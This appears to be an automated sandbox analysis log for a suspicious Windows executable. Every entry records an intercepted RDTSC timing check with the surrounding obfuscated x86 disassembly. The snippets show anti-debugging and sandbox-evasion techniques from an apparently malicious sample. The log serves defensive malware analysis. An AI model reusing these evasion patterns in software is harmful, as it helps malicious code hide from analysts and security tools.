Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2AD5C second address: C2ADA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov esi, edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 add esi, dword ptr [ebp+122D3660h] 0x0000001d xchg eax, ebx 0x0000001e push ebx 0x0000001f je 00007FF4D46D40CCh 0x00000025 jmp 00007FF4D46D40C6h 0x0000002a pop ebx 0x0000002b push eax 0x0000002c push ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2B7D9 second address: C2B854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FF4D529DDE8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jl 00007FF4D529DDEEh 0x00000029 pushad 0x0000002a sub dword ptr [ebp+122D224Eh], ecx 0x00000030 popad 0x00000031 push 00000000h 0x00000033 mov esi, edi 0x00000035 jmp 00007FF4D529DDEDh 0x0000003a push 00000000h 0x0000003c jno 00007FF4D529DDECh 0x00000042 add di, CF9Ah 0x00000047 xchg eax, ebx 0x00000048 pushad 0x00000049 pushad 0x0000004a pushad 0x0000004b popad 0x0000004c pushad 0x0000004d popad 0x0000004e popad 0x0000004f push eax 0x00000050 jmp 00007FF4D529DDF3h 0x00000055 pop eax 0x00000056 popad 0x00000057 push eax 0x00000058 push ebx 0x00000059 push esi 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2D439 second address: C2D441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2D441 second address: C2D451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2D451 second address: C2D48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007FF4D46D40B6h 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF4D46D40C3h 0x00000015 jmp 00007FF4D46D40C8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2ECBE second address: C2ECFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF7h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007FF4D529DDE6h 0x00000012 jmp 00007FF4D529DDF6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2FE65 second address: C2FE6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2FE6A second address: C2FE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF4D529DDEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C2FE79 second address: C2FE94 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FF4D46D40BCh 0x00000015 jc 00007FF4D46D40B6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C31E4E second address: C31E6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C32D23 second address: C32D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C32D29 second address: C32DBA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF4D529DDECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FF4D529DDE8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 movzx ebx, di 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007FF4D529DDE8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov ebx, dword ptr [ebp+122D1B0Eh] 0x0000004a mov ebx, dword ptr [ebp+122D3804h] 0x00000050 push 00000000h 0x00000052 push 00000000h 0x00000054 push ebp 0x00000055 call 00007FF4D529DDE8h 0x0000005a pop ebp 0x0000005b mov dword ptr [esp+04h], ebp 0x0000005f add dword ptr [esp+04h], 0000001Ch 0x00000067 inc ebp 0x00000068 push ebp 0x00000069 ret 0x0000006a pop ebp 0x0000006b ret 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jns 00007FF4D529DDE6h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C32DBA second address: C32DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C33DF7 second address: C33DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C33DFB second address: C33DFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C34D20 second address: C34D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C38F62 second address: C38F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C38F66 second address: C38F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C38F73 second address: C38F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C38F78 second address: C38F7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C38F7F second address: C38FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 add dword ptr [ebp+122D1B0Eh], edi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FF4D46D40B8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007FF4D46D40B8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 add dword ptr [ebp+122D2BDDh], eax 0x0000004c push eax 0x0000004d push edi 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C38FE0 second address: C38FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C33F30 second address: C33F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3AE44 second address: C3AE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3AE4A second address: C3AE8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 jnc 00007FF4D46D40BCh 0x0000000f push 00000000h 0x00000011 sub edi, 191529BEh 0x00000017 push 00000000h 0x00000019 xor dword ptr [ebp+12477035h], esi 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 jmp 00007FF4D46D40C6h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3AE8B second address: C3AEA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FF4D529DDE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C33F34 second address: C3400D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF4D46D40C7h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 call 00007FF4D46D40C1h 0x00000017 mov ebx, 387BF36Ch 0x0000001c pop ebx 0x0000001d mov edi, dword ptr [ebp+122D38ACh] 0x00000023 push dword ptr fs:[00000000h] 0x0000002a jng 00007FF4D46D40C1h 0x00000030 pushad 0x00000031 and dl, FFFFFFD5h 0x00000034 mov dword ptr [ebp+122D2638h], edi 0x0000003a popad 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 jmp 00007FF4D46D40C8h 0x00000047 mov eax, dword ptr [ebp+122D1171h] 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007FF4D46D40B8h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 mov bx, cx 0x0000006a jnc 00007FF4D46D40CCh 0x00000070 push FFFFFFFFh 0x00000072 add dword ptr [ebp+122D17B8h], edi 0x00000078 jp 00007FF4D46D40B8h 0x0000007e nop 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C35F9F second address: C35FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3BEE4 second address: C3BF50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+12450723h] 0x0000000d push edx 0x0000000e pop ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FF4D46D40B8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b adc bx, 17C2h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FF4D46D40B8h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c sub dword ptr [ebp+124576D5h], edx 0x00000052 xchg eax, esi 0x00000053 js 00007FF4D46D40CEh 0x00000059 push eax 0x0000005a push edx 0x0000005b jns 00007FF4D46D40B6h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C35FA3 second address: C36049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FF4D529DDE8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 or dword ptr [ebp+122D2321h], edi 0x00000028 mov bx, 9FADh 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov edi, dword ptr [ebp+122D3221h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FF4D529DDE8h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000018h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a mov dword ptr [ebp+12451842h], eax 0x00000060 jnc 00007FF4D529DDECh 0x00000066 mov ebx, dword ptr [ebp+122D30DFh] 0x0000006c mov eax, dword ptr [ebp+122D05FDh] 0x00000072 movsx edi, dx 0x00000075 push FFFFFFFFh 0x00000077 mov ebx, esi 0x00000079 mov edi, ebx 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007FF4D529DDF6h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C36049 second address: C36050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3CE87 second address: C3CF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 ja 00007FF4D529DDE8h 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007FF4D529DDF5h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FF4D529DDE8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f add dword ptr [ebp+122D1883h], edx 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 mov dx, 5FD6h 0x0000003c mov dword ptr [ebp+122D3144h], edi 0x00000042 popad 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007FF4D529DDE8h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f sub dword ptr [ebp+122D2DADh], edi 0x00000065 xchg eax, esi 0x00000066 jmp 00007FF4D529DDF3h 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e ja 00007FF4D529DDE8h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3CF22 second address: C3CF2C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF4D46D40BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3EF74 second address: C3EF7E instructions: 0x00000000 rdtsc 0x00000002 js 00007FF4D529DDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3EF7E second address: C3EF84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C39187 second address: C39192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF4D529DDE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3C12B second address: C3C13D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FF4D46D40B8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3D0BF second address: C3D0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3E0AA second address: C3E0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3805C second address: C380DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FF4D529DE00h 0x00000010 pushad 0x00000011 jmp 00007FF4D529DDF6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 nop 0x0000001a mov bh, D6h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 sub dword ptr [ebp+12457690h], esi 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 mov ebx, dword ptr [ebp+122D38C0h] 0x00000036 mov eax, dword ptr [ebp+122D16D1h] 0x0000003c mov bl, 3Ch 0x0000003e push FFFFFFFFh 0x00000040 mov dword ptr [ebp+122D31BAh], esi 0x00000046 nop 0x00000047 pushad 0x00000048 jmp 00007FF4D529DDF6h 0x0000004d push ecx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C380DA second address: C380E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C43AAF second address: C43AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C43AB5 second address: C43ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FF4D46D40BBh 0x00000011 jmp 00007FF4D46D40BAh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C43ADD second address: C43AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C43AE3 second address: C43AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C3F212 second address: C3F21D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FF4D529DDE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C43AE7 second address: C43AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D46D40BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C43AFD second address: C43B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: BE1241 second address: BE124F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF4D46D40BEh 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C4CB8C second address: C4CBA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF4D529DDEFh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C4C23B second address: C4C23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C4C390 second address: C4C395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C4C522 second address: C4C53F instructions: 0x00000000 rdtsc 0x00000002 je 00007FF4D46D40B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FF4D46D40BEh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C50F62 second address: C50F68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C50F68 second address: C50F84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF4D46D40C1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C50F84 second address: C50F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C50F8A second address: C50F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C50F8E second address: C50FC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4D529DDEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF4D529DDF9h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C50FC6 second address: C50FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\LbMTyCFRzs.exe	RDTSC instruction interceptor: First address: C50FCB second address: A7E9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007FF4D529DDF2h 0x00000010 pop eax 0x00000011 jp 00007FF4D529DDE7h 0x00000017 cld 0x00000018 push dword ptr [ebp+122D008Dh] 0x0000001e jno 00007FF4D529DDEEh 0x00000024 call dword ptr [ebp+122D353Fh] 0x0000002a pushad 0x0000002b mov dword ptr [ebp+122D2A6Ah], eax 0x00000031 xor eax, eax 0x00000033 pushad 0x00000034 push ecx 0x00000035 adc si, 0E53h 0x0000003a pop edi 0x0000003b mov edx, 2FA603E8h 0x00000040 popad 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 jl 00007FF4D529DDECh 0x0000004b mov dword ptr [ebp+122D2A6Ah], ebx 0x00000051 mov dword ptr [ebp+122D37F4h], eax 0x00000057 clc 0x00000058 mov esi, 0000003Ch 0x0000005d clc 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 jbe 00007FF4D529DDECh 0x00000068 mov dword ptr [ebp+122D3221h], esi 0x0000006e jc 00007FF4D529DDE7h 0x00000074 stc 0x00000075 lodsw 0x00000077 xor dword ptr [ebp+122D3221h], esi 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 jmp 00007FF4D529DDF1h 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a stc 0x0000008b nop 0x0000008c push esi 0x0000008d pushad 0x0000008e jmp 00007FF4D529DDF1h 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
